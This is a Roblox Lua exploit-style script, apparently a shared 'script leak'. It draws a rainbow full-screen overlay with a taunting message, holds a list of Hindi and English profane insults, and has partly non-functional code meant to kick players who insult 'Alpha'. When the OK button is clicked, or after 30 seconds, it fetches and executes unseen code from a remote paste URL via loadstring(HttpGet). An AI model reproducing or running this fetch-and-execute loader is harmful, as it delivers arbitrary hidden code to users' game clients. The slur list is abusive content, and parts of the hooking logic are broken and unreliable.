--[[ SCRIPT LEAK BY ALPHA DADDY RISER BETA JA JO KRNA HAI KR LE 😂 Rainbow Full Screen + OK Button Bottom-Right Anti-Alpha Insult System (Auto-Kick) ]] local screenGui = Instance.new("ScreenGui") screenGui.Parent = game.Players.LocalPlayer.PlayerGui screenGui.ResetOnSpawn = false -- Rainbow Frame local rainbowFrame = Instance.new("Frame") rainbowFrame.Size = UDim2.new(1, 0, 1, 0) rainbowFrame.BackgroundColor3 = Color3.fromRGB(255, 0, 0) rainbowFrame.Parent = screenGui -- Rainbow Animation local hue = 0 game:GetService("RunService").RenderStepped:Connect(function() hue = (hue + 0.005) % 1 rainbowFrame.BackgroundColor3 = Color3.fromHSV(hue, 1, 1) end) -- Top Text local topText = Instance.new("TextLabel") topText.Size = UDim2.new(1, 0, 0, 80) topText.Position = UDim2.new(0, 0, 0, 50) topText.BackgroundTransparency = 1 topText.Text = "SCRIPT LEAK BY ALPHA DADDY RISER BETA\nJA JO KRNA HAI KR LE 😂" topText.TextColor3 = Color3.fromRGB(255, 255, 255) topText.TextSize = 32 topText.TextScaled = true topText.Font = Enum.Font.GothamBold topText.TextWrapped = true topText.TextStrokeTransparency = 0 topText.TextStrokeColor3 = Color3.fromRGB(0, 0, 0) topText.Parent = rainbowFrame -- SMALL OK BUTTON - Bottom Right Corner local okButton = Instance.new("TextButton") okButton.Size = UDim2.new(0, 100, 0, 45) -- Chota button okButton.Position = UDim2.new(1, -120, 1, -60) -- Bottom-right okButton.BackgroundColor3 = Color3.fromRGB(255, 255, 255) okButton.TextColor3 = Color3.fromRGB(0, 0, 0) okButton.Text = "OK" okButton.TextSize = 28 okButton.Font = Enum.Font.GothamBold okButton.Parent = rainbowFrame -- Button Corner local corner = Instance.new("UICorner") corner.CornerRadius = UDim.new(0, 10) corner.Parent = okButton -- Button Hover Effect okButton.MouseEnter:Connect(function() okButton.BackgroundColor3 = Color3.fromRGB(200, 200, 200) end) okButton.MouseLeave:Connect(function() okButton.BackgroundColor3 = Color3.fromRGB(255, 255, 255) end) -- On OK Click - Load Chat okButton.MouseButton1Click:Connect(function() rainbowFrame:Destroy() loadstring(game:HttpGet("https://pastefy.app/jdZwrW7C/raw"))() end) -- ============================================ -- ANTI-ALPHA INSULT SYSTEM -- ============================================ task.wait(1) -- Wait for chat to load local function kickInsulters() local players = game:GetService("Players") local replicatedStorage = game:GetService("ReplicatedStorage") -- Hook into chat messages local function onChatMessage(player, message) if not player or not message then return end local lowerMsg = string.lower(message) -- List of insults to detect local insults = { "alpha mc", "alpha madarchod", "alpha bhosdi", "alpha chutiya", "alpha gandu", "alpha suar", "alpha kutta", "alpha harami", "alpha bkl", "alpha bsdk", "alpha lund", "alpha teri maa", "alpha behen", "alpha sister", "alpha mother", "fuck alpha", "alpha fuck", } for _, insult in ipairs(insults) do if string.find(lowerMsg, insult) then -- Kick the player game:GetService("Players"):FindFirstChild(player.Name):Kick("🚫 Alpha ko gali nahi dete! Stay respectful! 😤") return end end end -- Hook for RemoteEvents (most games use this for chat) local function hookRemoteEvents() for _, obj in ipairs(replicatedStorage:GetDescendants()) do if obj:IsA("RemoteEvent") and string.find(string.lower(obj.Name), "chat") then local oldEvent = obj.OnServerEvent obj.OnServerEvent = function(plr, msg) onChatMessage(plr, msg) oldEvent(plr, msg) end end end end -- Hook for TextChatService (newer games) local function hookTextChat() local textChatService = game:GetService("TextChatService") if textChatService then textChatService.MessageReceived:Connect(function(message) local player = players:FindFirstChild(message.TextSource) if player then onChatMessage(player, message.Text) end end) end end hookRemoteEvents() hookTextChat() -- Also check existing players for _, player in ipairs(players:GetPlayers()) do player.Chatted:Connect(function(msg) onChatMessage(player, msg) end) end -- New player joins players.PlayerAdded:Connect(function(player) player.Chatted:Connect(function(msg) onChatMessage(player, msg) end) end) end -- Start anti-insult system kickInsulters() -- Auto-proceed after 30 seconds task.wait(30) if rainbowFrame.Parent then rainbowFrame:Destroy() loadstring(game:HttpGet("https://pastefy.app/jdZwrW7C/raw"))() end